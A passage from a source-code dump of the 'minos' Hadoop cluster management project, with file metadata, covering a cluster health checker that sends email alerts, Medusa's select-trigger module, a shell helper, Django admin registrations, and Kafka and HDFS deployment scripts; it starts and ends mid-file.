Status.ERROR\n job.last_message = \"Too many active masters!\"\n elif active < 1:\n job.last_status = Status.ERROR\n job.last_message = \"No active masters!\"\n elif job.running_tasks_count < 2:\n # TODO: Now it always reports warning as backup master doesn't run a http\n # server before it acquires zk lock. Comment this out and would change\n # master's startup workflow.\n #job.last_status = Status.WARN\n #job.last_message = \"Less than 2 running masters, no HA guarantee\"\n pass\n\n job = cluster.jobs[\"regionserver\"]\n if job.running_tasks_count < 3:\n job.last_status = Status.ERROR\n job.last_message = \"Too few running regionservers!\"\n cluster.last_status = max([job.last_status for job in cluster.jobs.itervalues()])\n\n def check_yarn_cluster_status(self, cluster):\n job = cluster.jobs[\"resourcemanager\"]\n for task in job.running_tasks.itervalues():\n # update cluster entry\n cluster.entry = '%s:%d' % (task.host, task.port)\n if job.running_tasks_count < 1:\n job.last_status = Status.ERROR\n job.last_message = \"No running resourcemanager!\"\n\n job = cluster.jobs[\"proxyserver\"]\n if job.running_tasks_count < 1:\n job.last_status = Status.ERROR\n job.last_message = \"No running proxyserver!\"\n\n job = cluster.jobs[\"nodemanager\"]\n if job.running_tasks_count < 3:\n job.last_status = Status.ERROR\n job.last_message = \"Too few running nodemanager!\"\n cluster.last_status = max([job.last_status for job in cluster.jobs.itervalues()])\n\n job = cluster.jobs[\"historyserver\"]\n if job.running_tasks_count < 1:\n job.last_status = Status.ERROR\n job.last_message = \"Too few running historyserver!\"\n cluster.last_status = max([job.last_status for job in cluster.jobs.itervalues()])\n\n def check_impala_cluster_status(self, cluster):\n job = cluster.jobs[\"statestored\"]\n for task in job.running_tasks.itervalues():\n # update cluster entry\n cluster.entry = '%s:%d' % (task.host, task.port)\n if job.running_tasks_count < 1:\n job.last_status = Status.ERROR\n job.last_message = \"No running statestored!\"\n\n job = cluster.jobs[\"impalad\"]\n if job.running_tasks_count < 3:\n job.last_status = Status.ERROR\n job.last_message = \"Too few running impalad!\"\n cluster.last_status = max([job.last_status for job in cluster.jobs.itervalues()])\n\n def check_cluster_status(self, cluster):\n cluster.jobs = {}\n cluster.last_status = Status.OK\n cluster.last_message = \"\"\n\n for job in cluster.job_set.all():\n job.running_tasks = {}\n job.tasks = {}\n job.last_status = Status.OK\n job.last_message = \"\"\n job.running_tasks_count = 0\n job.total_tasks_count = 0\n for task in job.task_set.filter(active=True):\n if task.health:\n job.running_tasks[task.id] = task\n job.running_tasks_count += 1\n job.total_tasks_count += 1\n cluster.jobs[job.name] = job\n\n service_handler = {\n \"hdfs\": self.check_hdfs_cluster_status,\n \"hbase\": self.check_hbase_cluster_status,\n \"yarn\": self.check_yarn_cluster_status,\n \"impala\": self.check_impala_cluster_status,\n }\n service_handler[cluster.service.name](cluster)\n self.handle_status_result(cluster)\n\n def handle_status_result(self, cluster):\n # last_status store cluster_name->(status, status_times)\n (cluster_status, status_times) = self.last_status.setdefault(str(cluster), (Status.OK, 0))\n need_send_alert = False\n\n if cluster.last_status != cluster_status:\n self.last_status[str(cluster)] = (cluster.last_status, 1)\n if cluster.last_status == Status.OK and status_times >= ERROR_TIMES_FOR_ALERT:\n # send alert when cluster changed to from PROBLEM(alerted) to OK\n need_send_alert = True\n else:\n self.last_status[str(cluster)] = (cluster.last_status, status_times+1)\n # send alert when cluster in PROBLEM stutus reached ERROR_TIMES_FOR_ALERT times\n if cluster.last_status != Status.OK and status_times + 1 == ERROR_TIMES_FOR_ALERT:\n need_send_alert = True\n\n if need_send_alert:\n self.alert_msg += '[%s]Cluster[%s]\\n' \\\n % ('OK' if cluster.last_status == Status.OK else 'PROBLEM',\n cluster)\n for job in cluster.jobs.itervalues():\n if job.last_status != Status.OK:\n self.alert_msg += 'Job[%s] not healthy: %s\\n' % (job.name, job.last_message)\n self.alert_msg += '******\\n'\n\n\n def check_status(self):\n self.alert_msg = ''\n logger.info(\"checking clusters status\")\n\n self.start_time = time.time()\n for cluster in Cluster.objects.filter(active=True).all():\n self.check_cluster_status(cluster)\n logger.info(\"spent %f seconds for updating clusters status\",\n time.time() - self.start_time)\n if self.alert_msg:\n logger.warn('alert msg: %r' % self.alert_msg)\n self.mailer.send_email(subject = 'OWL cluster alert',\n content = self.alert_msg,\n to_email = self.options['to_email'])\n json.dump(self.last_status, open(STATUS_FILE_PATH, 'w'))\n\nclass Command(BaseCommand):\n args = ''\n help = \"Run the background collector to fetch metrics from /jmx on each server.\"\n\n option_list = BaseCommand.option_list + (\n make_option(\n \"--to_email\",\n help=\"Email address to\"),\n make_option(\n \"--period\",\n default=60,\n help=\"Check period\"),\n )\n\n def handle(self, *args, **options):\n self.args = args\n self.options = options\n self.mailer = utils.mail.Mailer(options)\n\n self.stdout.write(\"args: %r\\n\" % (args, ))\n self.stdout.write(\"options: %r\\n\" % options)\n\n self.collector_config = CollectorConfig(self.args, self.options)\n\n self.last_status = {}\n try:\n self.last_status = json.load(open(STATUS_FILE_PATH, 'r'))\n except Exception as e:\n logger.warning('Failed to load status file: %r', e)\n\n status_checker = StatusChecker(self.collector_config,\n self.last_status,\n self.options,\n self.mailer)\n\n while True:\n try:\n status_checker.check_status()\n except Exception as e:\n logger.warning('OWL cluster checker error: %r', e)\n # send alert email when program got error\n admin_email = ''\n try:\n admin_email = settings.ADMINS[0][1]\n except:\n pass\n self.mailer.send_email(subject = 'OWL cluster check error',\n content = repr(e),\n to_email = admin_email,\n )\n time.sleep(int(self.options['period']))\n"
},
{
"alpha_fraction": 0.508700966835022,
"alphanum_fraction": 0.516790509223938,
"avg_line_length": 31.411584854125977,
"blob_id": "388d455579078e8297915e384d6be428c69b70e8",
"content_id": "8c7a3c8636167581aa47bf8c636ca590c2c07bef",
"detected_licenses": [
"Apache-2.0",
"HPND",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10631,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 328,
"path": "/supervisor/supervisor/medusa/thread/select_trigger.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\n##############################################################################\n#\n# Copyright (c) 2001, 2002 Zope Corporation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.0 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE\n#\n##############################################################################\n\n__revision__ = \"$Id: select_trigger.py,v 1.4 2003/01/09 15:49:15 akuchling Exp $\"\n\nimport asyncore_25 as asyncore\nimport asynchat_25 as asynchat\n\nimport os\nimport socket\nimport string\nimport thread\n\nif os.name == 'posix':\n\n class trigger (asyncore.file_dispatcher):\n\n \"Wake up a call to select() running in the main thread\"\n\n # This is useful in a context where you are using Medusa's I/O\n # subsystem to deliver data, but the data is generated by another\n # thread. Normally, if Medusa is in the middle of a call to\n # select(), new output data generated by another thread will have\n # to sit until the call to select() either times out or returns.\n # If the trigger is 'pulled' by another thread, it should immediately\n # generate a READ event on the trigger object, which will force the\n # select() invocation to return.\n\n # A common use for this facility: letting Medusa manage I/O for a\n # large number of connections; but routing each request through a\n # thread chosen from a fixed-size thread pool. When a thread is\n # acquired, a transaction is performed, but output data is\n # accumulated into buffers that will be emptied more efficiently\n # by Medusa. [picture a server that can process database queries\n # rapidly, but doesn't want to tie up threads waiting to send data\n # to low-bandwidth connections]\n\n # The other major feature provided by this class is the ability to\n # move work back into the main thread: if you call pull_trigger()\n # with a thunk argument, when select() wakes up and receives the\n # event it will call your thunk from within that thread. The main\n # purpose of this is to remove the need to wrap thread locks around\n # Medusa's data structures, which normally do not need them. [To see\n # why this is true, imagine this scenario: A thread tries to push some\n # new data onto a channel's outgoing data queue at the same time that\n # the main thread is trying to remove some]\n\n def __init__ (self):\n r, w = self._fds = os.pipe()\n self.trigger = w\n asyncore.file_dispatcher.__init__(self, r)\n self.lock = thread.allocate_lock()\n self.thunks = []\n self._closed = 0\n\n # Override the asyncore close() method, because it seems that\n # it would only close the r file descriptor and not w. The\n # constructor calls file_dispatcher.__init__ and passes r,\n # which would get stored in a file_wrapper and get closed by\n # the default close. But that would leave w open...\n\n def close(self):\n if not self._closed:\n self._closed = 1\n self.del_channel()\n for fd in self._fds:\n os.close(fd)\n self._fds = []\n \n def __repr__ (self):\n return '<select-trigger (pipe) at %x>' % id(self)\n\n def readable (self):\n return 1\n\n def writable (self):\n return 0\n\n def handle_connect (self):\n pass\n\n def handle_close(self):\n self.close()\n\n def pull_trigger (self, thunk=None):\n # print 'PULL_TRIGGER: ', len(self.thunks)\n if thunk:\n self.lock.acquire()\n try:\n self.thunks.append(thunk)\n finally:\n self.lock.release()\n os.write(self.trigger, 'x')\n\n def handle_read (self):\n try:\n self.recv(8192)\n except socket.error:\n return\n self.lock.acquire()\n try:\n for thunk in self.thunks:\n try:\n thunk()\n except:\n nil, t, v, tbinfo = asyncore.compact_traceback()\n print ('exception in trigger thunk:'\n ' (%s:%s %s)' % (t, v, tbinfo))\n self.thunks = []\n finally:\n self.lock.release()\n\nelse:\n\n # win32-safe version\n\n # XXX Should define a base class that has the common methods and\n # then put the platform-specific in a subclass named trigger.\n\n HOST = '127.0.0.1'\n MINPORT = 19950\n NPORTS = 50\n\n class trigger (asyncore.dispatcher):\n portoffset = 0\n\n def __init__ (self):\n a = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n w = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # set TCP_NODELAY to true to avoid buffering\n w.setsockopt(socket.IPPROTO_TCP, 1, 1)\n\n # tricky: get a pair of connected sockets\n for i in range(NPORTS):\n trigger.portoffset = (trigger.portoffset + 1) % NPORTS\n port = MINPORT + trigger.portoffset\n address = (HOST, port)\n try:\n a.bind(address)\n except socket.error:\n continue\n else:\n break\n else:\n raise RuntimeError, 'Cannot bind trigger!'\n\n a.listen(1)\n w.setblocking(0)\n try:\n w.connect(address)\n except:\n pass\n r, addr = a.accept()\n a.close()\n w.setblocking(1)\n self.trigger = w\n\n asyncore.dispatcher.__init__(self, r)\n self.lock = thread.allocate_lock()\n self.thunks = []\n self._trigger_connected = 0\n\n def __repr__ (self):\n return '<select-trigger (loopback) at %x>' % id(self)\n\n def readable (self):\n return 1\n\n def writable (self):\n return 0\n\n def handle_connect (self):\n pass\n\n def pull_trigger (self, thunk=None):\n if thunk:\n self.lock.acquire()\n try:\n self.thunks.append(thunk)\n finally:\n self.lock.release()\n self.trigger.send('x')\n\n def handle_read (self):\n try:\n self.recv(8192)\n except socket.error:\n return\n self.lock.acquire()\n try:\n for thunk in self.thunks:\n try:\n thunk()\n except:\n nil, t, v, tbinfo = asyncore.compact_traceback()\n print ('exception in trigger thunk:'\n ' (%s:%s %s)' % (t, v, tbinfo))\n self.thunks = []\n finally:\n self.lock.release()\n\n\nthe_trigger = None\n\nclass trigger_file:\n\n \"A 'triggered' file object\"\n\n buffer_size = 4096\n\n def __init__ (self, parent):\n global the_trigger\n if the_trigger is None:\n the_trigger = trigger()\n self.parent = parent\n self.buffer = ''\n\n def write (self, data):\n self.buffer = self.buffer + data\n if len(self.buffer) > self.buffer_size:\n d, self.buffer = self.buffer, ''\n the_trigger.pull_trigger (\n lambda d=d,p=self.parent: p.push (d)\n )\n\n def writeline (self, line):\n self.write (line+'\\r\\n')\n\n def writelines (self, lines):\n self.write (\n string.joinfields (\n lines,\n '\\r\\n'\n ) + '\\r\\n'\n )\n\n def flush (self):\n if self.buffer:\n d, self.buffer = self.buffer, ''\n the_trigger.pull_trigger (\n lambda p=self.parent,d=d: p.push (d)\n )\n\n def softspace (self, *args):\n pass\n\n def close (self):\n # in a derived class, you may want to call trigger_close() instead.\n self.flush()\n self.parent = None\n\n def trigger_close (self):\n d, self.buffer = self.buffer, ''\n p, self.parent = self.parent, None\n the_trigger.pull_trigger (\n lambda p=p,d=d: (p.push(d), p.close_when_done())\n )\n\nif __name__ == '__main__':\n\n import time\n\n def thread_function (output_file, i, n):\n print 'entering thread_function'\n while n:\n time.sleep (5)\n output_file.write ('%2d.%2d %s\\r\\n' % (i, n, output_file))\n output_file.flush()\n n = n - 1\n output_file.close()\n print 'exiting thread_function'\n\n class thread_parent (asynchat.async_chat):\n\n def __init__ (self, conn, addr):\n self.addr = addr\n asynchat.async_chat.__init__ (self, conn)\n self.set_terminator ('\\r\\n')\n self.buffer = ''\n self.count = 0\n\n def collect_incoming_data (self, data):\n self.buffer = self.buffer + data\n\n def found_terminator (self):\n data, self.buffer = self.buffer, ''\n if not data:\n asyncore.close_all()\n print \"done\"\n return\n n = string.atoi (string.split (data)[0])\n tf = trigger_file (self)\n self.count = self.count + 1\n thread.start_new_thread (thread_function, (tf, self.count, n))\n\n class thread_server (asyncore.dispatcher):\n\n def __init__ (self, family=socket.AF_INET, address=('', 9003)):\n asyncore.dispatcher.__init__ (self)\n self.create_socket (family, socket.SOCK_STREAM)\n self.set_reuse_addr()\n self.bind (address)\n self.listen (5)\n\n def handle_accept (self):\n conn, addr = self.accept()\n tp = thread_parent (conn, addr)\n\n thread_server()\n #asyncore.loop(1.0, use_poll=1)\n try:\n asyncore.loop ()\n except:\n asyncore.close_all()\n"
},
{
"alpha_fraction": 0.558282196521759,
"alphanum_fraction": 0.5766870975494385,
"avg_line_length": 15.300000190734863,
"blob_id": "d1d520887be54feea26bb3a13916f6fa8d8b6d6b",
"content_id": "efe0719b908624a05847103d4987c1d8ad3ee3aa",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 163,
"license_type": "permissive",
"max_line_length": 29,
"num_lines": 10,
"path": "/build/bin/script_utils.sh",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nfunction get_child_pid() {\n child_pid=`pgrep -P $1`\n while [ -z $child_pid ]; do\n sleep 1\n child_pid=`pgrep -P $1`\n done\n echo $child_pid\n}\n"
},
{
"alpha_fraction": 0.8223140239715576,
"alphanum_fraction": 0.8223140239715576,
"avg_line_length": 25.88888931274414,
"blob_id": "9a565268ce358c831fb0955508f9ca1aeae315b1",
"content_id": "10abf8e673ada37a632cf091b09dbe392f3e4776",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 484,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 18,
"path": "/owl/monitor/admin.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom models import Service, Cluster, Job, Task\nfrom models import HBaseCluster, RegionServer, Table, Region\nfrom models import Counter\nfrom models import Quota\n\nadmin.site.register(Service)\nadmin.site.register(Cluster)\nadmin.site.register(Job)\nadmin.site.register(Task)\n\nadmin.site.register(HBaseCluster)\nadmin.site.register(RegionServer)\nadmin.site.register(Table)\nadmin.site.register(Region)\n\nadmin.site.register(Counter)\nadmin.site.register(Quota)\n"
},
{
"alpha_fraction": 0.7135338187217712,
"alphanum_fraction": 0.7140350937843323,
"avg_line_length": 37.73786544799805,
"blob_id": "eaf549fbb1781c7746240979ea0eb4e701fc1a98",
"content_id": "f716a22900c092bb89fd4f6f98a63d9202ab5429",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7980,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 206,
"path": "/client/deploy_kafka.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport argparse\nimport os\nimport parallel_deploy\nimport service_config\nimport subprocess\nimport sys\nimport urlparse\n\nimport deploy_utils\n\nfrom log import Log\n\nALL_JOBS = [\"kafka\", \"kafkascribe\"]\n\ndef _get_kafka_service_config(args):\n args.kafka_config = deploy_utils.get_service_config(args)\n\ndef generate_configs(args, job_name, host_id, instance_id):\n kafka_cfg_dict = args.kafka_config.configuration.generated_files[\"kafka.cfg\"]\n hosts = args.kafka_config.jobs[job_name].hosts\n kafka_cfg_dict[\"broker.id\"] = deploy_utils.get_task_id(hosts, host_id, instance_id)\n kafka_cfg = deploy_utils.generate_properties_file(args, kafka_cfg_dict)\n\n kafka_scribe_cfg_dict = args.kafka_config.configuration.generated_files[\"kafka-scribe.cfg\"]\n kafka_job = args.kafka_config.jobs[\"kafka\"]\n kafka_scribe_cfg_dict[\"metadata.broker.list\"] = \",\".join(\n service_config.get_job_host_port_list(kafka_job))\n kafka_scribe_cfg = deploy_utils.generate_properties_file(args, kafka_scribe_cfg_dict)\n\n config_files = {\n \"kafka.cfg\": kafka_cfg,\n \"kafka-scribe.cfg\": kafka_scribe_cfg,\n }\n config_files.update(args.kafka_config.configuration.raw_files)\n\n return config_files\n\ndef generate_run_scripts_params(args, host, job_name, host_id, instance_id):\n job = args.kafka_config.jobs[job_name]\n\n supervisor_client = deploy_utils.get_supervisor_client(host,\n \"kafka\", args.kafka_config.cluster.name, job_name, instance_id=instance_id)\n\n artifact_and_version = \"kafka-\" + args.kafka_config.cluster.version\n\n jar_dirs = \"$package_dir/*\"\n log_level = deploy_utils.get_service_log_level(args, args.kafka_config)\n\n params = job.get_arguments(args, args.kafka_config.cluster, args.kafka_config.jobs,\n args.kafka_config.arguments_dict, job_name, host_id, instance_id)\n\n script_dict = {\n \"artifact\": artifact_and_version,\n \"job_name\": job_name,\n \"jar_dirs\": jar_dirs,\n \"run_dir\": supervisor_client.get_run_dir(),\n \"params\": params,\n }\n\n return script_dict\n\ndef generate_start_script(args, host, job_name, host_id, instance_id):\n script_params = generate_run_scripts_params(args, host, job_name, host_id, instance_id)\n return deploy_utils.create_run_script(\n \"%s/start.sh.tmpl\" % deploy_utils.get_template_dir(),\n script_params)\n\ndef install(args):\n _get_kafka_service_config(args)\n deploy_utils.install_service(args, \"kafka\", args.kafka_config, \"kafka\")\n\ndef cleanup_job(args, host, job_name, host_id, instance_id, cleanup_token, active):\n deploy_utils.cleanup_job(\"kafka\", args.kafka_config,\n host, job_name, instance_id, cleanup_token)\n\ndef cleanup(args):\n _get_kafka_service_config(args)\n\n cleanup_token = deploy_utils.confirm_cleanup(args,\n \"kafka\", args.kafka_config)\n for job_name in args.job or ALL_JOBS:\n hosts = args.kafka_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name,\n 'cleanup', cleanup_token=cleanup_token)\n parallel_deploy.start_deploy_threads(cleanup_job, task_list)\n\ndef bootstrap_job(args, host, job_name, host_id, instance_id, cleanup_token, active):\n # parse the service_config according to the instance_id\n args.kafka_config.parse_generated_config_files(args, job_name, host_id, instance_id)\n deploy_utils.bootstrap_job(args, \"kafka\", \"kafka\",\n args.kafka_config, host, job_name, instance_id, cleanup_token, '0')\n start_job(args, host, job_name, host_id, instance_id)\n\ndef bootstrap(args):\n _get_kafka_service_config(args)\n cleanup_token = deploy_utils.confirm_bootstrap(\"kafka\", args.kafka_config)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.kafka_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name,\n 'bootstrap', cleanup_token=cleanup_token)\n parallel_deploy.start_deploy_threads(bootstrap_job, task_list)\n\ndef start_job(args, host, job_name, host_id, instance_id, is_wait=False):\n if is_wait:\n deploy_utils.wait_for_job_stopping(\"kafka\",\n args.kafka_config.cluster.name, job_name, host, instance_id)\n\n # parse the service_config according to the instance_id\n args.kafka_config.parse_generated_config_files(args, job_name, host_id, instance_id)\n\n config_files = generate_configs(args, job_name, host_id, instance_id)\n start_script = generate_start_script(args, host, job_name, host_id, instance_id)\n http_url = deploy_utils.get_http_service_uri(host,\n args.kafka_config.jobs[job_name].base_port, instance_id)\n deploy_utils.start_job(args, \"kafka\", \"kafka\", args.kafka_config,\n host, job_name, instance_id, start_script, http_url, **config_files)\n\ndef start(args):\n if not args.skip_confirm:\n deploy_utils.confirm_start(args)\n _get_kafka_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.kafka_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'start')\n parallel_deploy.start_deploy_threads(start_job, task_list)\n\ndef stop_job(args, host, job_name, instance_id):\n deploy_utils.stop_job(\"kafka\", args.kafka_config, host, job_name, instance_id)\n\ndef stop(args):\n if not args.skip_confirm:\n deploy_utils.confirm_stop(args)\n _get_kafka_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.kafka_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'stop')\n parallel_deploy.start_deploy_threads(stop_job, task_list)\n\ndef restart(args):\n if not args.skip_confirm:\n deploy_utils.confirm_restart(args)\n _get_kafka_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.kafka_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'stop')\n parallel_deploy.start_deploy_threads(stop_job, task_list)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.kafka_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name,\n 'start', is_wait=True)\n parallel_deploy.start_deploy_threads(start_job, task_list)\n\ndef show_job(args, host, job_name, instance_id):\n deploy_utils.show_job(\"kafka\", args.kafka_config, host, job_name, instance_id)\n\ndef show(args):\n _get_kafka_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.kafka_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'show')\n parallel_deploy.start_deploy_threads(show_job, task_list)\n\ndef run_shell(args):\n Log.print_critical(\"'shell' command is not supported!\")\n\ndef pack(args):\n Log.print_critical(\"'pack' command is not supported!\")\n\ndef rolling_update(args):\n if not args.job:\n Log.print_critical(\"You must specify the job name to do rolling update\")\n\n _get_kafka_service_config(args)\n job_name = args.job[0]\n\n if not args.skip_confirm:\n deploy_utils.confirm_action(args, \"rolling_update\")\n\n Log.print_info(\"Rolling updating %s\" % job_name)\n hosts = args.kafka_config.jobs[job_name].hosts\n wait_time = 0\n\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.iterkeys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n deploy_utils.confirm_rolling_update(host_id, instance_id, wait_time)\n stop_job(args, hosts[host_id].ip, job_name, instance_id)\n deploy_utils.wait_for_job_stopping(\"kafka\",\n args.kafka_config.cluster.name, job_name, hosts[host_id].ip, instance_id)\n start_job(args, hosts[host_id].ip, job_name, host_id, instance_id)\n deploy_utils.wait_for_job_starting(\"kafka\",\n args.kafka_config.cluster.name, job_name, hosts[host_id].ip, instance_id)\n wait_time = args.time_interval\n Log.print_success(\"Rolling updating %s success\" % job_name)\n\nif __name__ == '__main__':\n test()\n"
},
{
"alpha_fraction": 0.6941611766815186,
"alphanum_fraction": 0.6955329179763794,
"avg_line_length": 40.19655990600586,
"blob_id": "c03827e9127e2a6bd0528193e3f7bd7fa158c9bb",
"content_id": "ed5db94c9791479dc26c9b960672240368b9be97",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16767,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 407,
"path": "/client/deploy_hdfs.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import deploy_utils\nimport parallel_deploy\nimport service_config\nimport subprocess\nimport sys\nimport time\n\nfrom log import Log\n\nALL_JOBS = [\"journalnode\", \"zkfc\", \"namenode\", \"datanode\"]\n\nSHELL_COMMAND_INFO = {\n \"dfs\": (\"org.apache.hadoop.fs.FsShell\",\n \"run a filesystem command on the file systems supported in Hadoop\"),\n \"dfsadmin\": (\"org.apache.hadoop.hdfs.tools.DFSAdmin\",\n \"run a DFS admin client\"),\n \"haadmin\": (\"org.apache.hadoop.hdfs.tools.DFSHAAdmin\",\n \"run a DFS HA admin client\"),\n \"fsck\": (\"org.apache.hadoop.hdfs.tools.DFSck\",\n \"run a DFS filesystem checking utility\"),\n \"balancer\": (\"org.apache.hadoop.hdfs.server.balancer.Balancer\",\n \"run a cluster balancing utility\"),\n \"jmxget\": (\"org.apache.hadoop.hdfs.tools.JMXGet\",\n \"get JMX exported values from NameNode or DataNode\"),\n \"oiv\": (\"org.apache.hadoop.hdfs.tools.offlineImageViewer.OfflineImageViewer\",\n \"apply the offline fsimage viewer to an fsimage\"),\n \"oev\": (\"org.apache.hadoop.hdfs.tools.offlineEditsViewer.OfflineEditsViewer\",\n \"apply the offline edits viewer to an edits file\"),\n \"fetchdt\": (\"org.apache.hadoop.hdfs.tools.DelegationTokenFetcher\",\n \"fetch a delegation token from the NameNode\"),\n \"getconf\": (\"org.apache.hadoop.hdfs.tools.GetConf\",\n \"get config values from configuration\"),\n \"groups\": (\"org.apache.hadoop.hdfs.tools.GetGroups\",\n \"get the groups which users belong to\"),\n}\n\ndef generate_metrics_config(args, host, job_name, instance_id=-1):\n job = args.hdfs_config.jobs[job_name]\n\n supervisor_client = deploy_utils.get_supervisor_client(host,\n \"hdfs\", args.hdfs_config.cluster.name, job_name, instance_id=instance_id)\n\n ganglia_switch = \"# \"\n if args.hdfs_config.cluster.ganglia_address:\n ganglia_switch = \"\"\n config_dict = {\n \"job_name\": job_name,\n \"period\": 10,\n \"data_dir\": supervisor_client.get_log_dir(),\n \"ganglia_address\": args.hdfs_config.cluster.ganglia_address,\n \"ganglia_switch\": ganglia_switch,\n }\n\n local_path = \"%s/hadoop-metrics2.properties.tmpl\" % deploy_utils.get_template_dir()\n template = deploy_utils.Template(open(local_path, \"r\").read())\n return template.substitute(config_dict)\n\ndef generate_configs(args, host, job_name, instance_id):\n core_site_xml = deploy_utils.generate_site_xml(args,\n args.hdfs_config.configuration.generated_files[\"core-site.xml\"])\n hdfs_site_xml = deploy_utils.generate_site_xml(args,\n args.hdfs_config.configuration.generated_files[\"hdfs-site.xml\"])\n hadoop_metrics2_properties = generate_metrics_config(args, host, job_name, instance_id)\n\n config_files = {\n \"core-site.xml\": core_site_xml,\n \"hdfs-site.xml\": hdfs_site_xml,\n \"hadoop-metrics2.properties\": hadoop_metrics2_properties,\n }\n config_files.update(args.hdfs_config.configuration.raw_files)\n\n return config_files\n\ndef generate_run_scripts_params(args, host, job_name, host_id, instance_id):\n job = args.hdfs_config.jobs[job_name]\n\n supervisor_client = deploy_utils.get_supervisor_client(host,\n \"hdfs\", args.hdfs_config.cluster.name, job_name, instance_id=instance_id)\n\n artifact_and_version = \"hadoop-\" + args.hdfs_config.cluster.version\n\n jar_dirs = \"\"\n # must include both [dir]/ and [dir]/* as [dir]/* only import all jars under\n # this dir but we also need access the webapps under this dir.\n for component in [\"common\", \"hdfs\"]:\n if jar_dirs: jar_dirs += \":\"\n component_dir = (\"$package_dir/share/hadoop/%s\" % component)\n jar_dirs += \"%s/:%s/lib/*:%s/*\" % (\n component_dir, component_dir, component_dir)\n log_level = deploy_utils.get_service_log_level(args, args.hdfs_config)\n\n params = job.get_arguments(args, args.hdfs_config.cluster, args.hdfs_config.jobs,\n args.hdfs_config.arguments_dict, job_name, host_id, instance_id)\n\n script_dict = {\n \"artifact\": artifact_and_version,\n \"job_name\": job_name,\n \"jar_dirs\": jar_dirs,\n \"run_dir\": supervisor_client.get_run_dir(),\n \"params\": params,\n }\n\n return script_dict\n\ndef get_hdfs_service_config(args):\n args.hdfs_config = deploy_utils.get_service_config(args)\n if not args.hdfs_config.cluster.zk_cluster:\n Log.print_critical(\n \"hdfs cluster must depends on a zookeeper clusters: %s\" %\n args.hdfs_config.cluster.name)\n\n namenode_hosts = args.hdfs_config.jobs[\"namenode\"].hosts\n args.hdfs_config.jobs[\"zkfc\"].hosts = namenode_hosts.copy()\n args.skip_gen_config_files = False\n\ndef generate_bootstrap_script(args, host, job_name, host_id, instance_id, active):\n option = str()\n script_params = generate_run_scripts_params(args, host, job_name, host_id, instance_id)\n script_params['ha_status'] = 'standby'\n if job_name == \"zkfc\":\n if active:\n option = \"-formatZK\"\n script_params['ha_status'] = 'active'\n elif job_name == \"namenode\":\n if active:\n option = \"-format -nonInteractive\"\n else:\n option = \"-bootstrapStandby -skipSharedEditsCheck -nonInteractive\"\n script_params['params'] += \" %s\" % option\n\n return deploy_utils.create_run_script(\n '%s/bootstrap_hdfs.sh.tmpl' % deploy_utils.get_template_dir(),\n script_params)\n\ndef generate_cleanup_script(args, host, job_name, host_id, instance_id, active):\n script_params = generate_run_scripts_params(args, host, job_name, host_id, instance_id)\n script_params['params'] += \" -clearZK\"\n if active:\n script_params['ha_status'] = 'active'\n else:\n script_params['ha_status'] = 'standby'\n return deploy_utils.create_run_script(\n '%s/cleanup_hdfs.sh.tmpl' % deploy_utils.get_template_dir(),\n script_params)\n\ndef generate_start_script(args, host, job_name, host_id, instance_id):\n script_params = generate_run_scripts_params(args, host, job_name, host_id, instance_id)\n return deploy_utils.create_run_script(\n '%s/start.sh.tmpl' % deploy_utils.get_template_dir(),\n script_params)\n\ndef check_journalnode_all_started(args):\n job = args.hdfs_config.jobs[\"journalnode\"]\n hosts = job.hosts\n for host_id in hosts.iterkeys():\n for instance_id in range(hosts[host_id].instance_num):\n if not deploy_utils.check_service(hosts[host_id].ip,\n service_config.get_base_port(job.base_port, instance_id)):\n return False\n return True\n\ndef get_data_dir_indexes(args, 